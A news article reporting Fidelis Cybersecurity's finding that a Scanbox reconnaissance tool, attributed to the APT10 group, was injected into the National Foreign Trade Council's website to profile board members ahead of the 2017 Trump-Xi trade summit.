'Chinese hackers' linked to espionage campaign on board directors of Google, Amazon, IBM

Ahead of the trade summit this week between US President Donald Trump and his Chinese counterpart, Xi Jinping, security experts claim a nation-state hacking group conducted espionage on a number of key industry players and lobbyists with links to the talks.

Between 27 February and 1 March this year, the operation – dubbed "Operation TradeSecret" – used malware in an attempt to snoop on private-sector officials registering to the website of the National Foreign Trade Council (NFTC), Fidelis Cybersecurity revealed.

The hackers targeted the NFTC's board of directors, which counts representatives from Amazon, Microsoft, Google, IBM, Visa, eBay, Cisco as members.

Several prominent people linked to the trade group are "key participants in the dialogue around the composition of the new trade policy being formulated within the Trump administration", Fidelis said.

Pages of the website had been compromised using a reconnaissance tool known as "Scanbox" which has been previously linked to Chinese nation-state hacking teams.

The security experts found evidence that similar cyberattacks were conducted against government officials in Japan.

"We first observed the injection on the registration page for a board of directors meeting in Washington DC, scheduled for March 7, 2017," the researchers said. "The injected link would run the Scanbox framework on the computer of anyone who visited the web page.

"Scanbox can be used to determine the versions of applications, as well as other selected tools, such as JavaScript keyloggers, running on the target's machine.

"The information gathered with this reconnaissance can be used in phishing campaigns directed toward targeted individuals. These campaigns can then exploit specific vulnerabilities known to exist within the user's applications." The team said no successful attacks were uncovered.

However, it issued a warning to all potential targets: "Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks such as spearphishing campaigns."

While the malware-ridden link was removed on 2 March, Fidelis researchers said the operation had "almost certainly concluded by that time". The NFTC, a Fidelis customer, worked with the cybersecurity firm and the FBI to resolve the issue, Reuters reported.

The team said it is highly probable the hackers involved are linked to a group known as Stone Panda, or APT10. The same group was recently named as the culprit of a widespread cyber-espionage campaign in research released by UK spy agency GCHQ and BAE Systems this week (3 April).

Sandbox, the group's reconnaissance tool, was previously used in a number of well-publicised breaches blamed on Chinese state hackers. This includes Anthem Healthcare and the US Office of Personnel Management (OPM), the latter of which exposed millions of federal records.

"The findings of potential cyber-espionage occurring in trade discussions between the US and China is certainly significant," said Hardik Modi, vice president of threat research at Fidelis Cybersecurity.

Modi said the motive was likely "intelligence collection". While frowned upon and legally murky, this is the generally the work of spies and every nation with the capability to do so conducts such operations.

President Obama and Xi Jinping came to a landmark agreement in 2015 to reduce cyber-espionage operations against each other's countries, however it remains to be seen if this remains in effect under the administration – and increasingly aggressive rhetoric – of Donald Trump.

"While this action in itself might not definitively violate the Obama-Xi Jinping agreement of 2015, it is demonstrative of the "dual-use" nature of cyber where the private sector is likely impacted, even when nation-state espionage is the objective," Modi said.

He warned: "Coupled with the targeting that has been observed in the UK and Japan, this might mark the return of Chinese cyber in the West."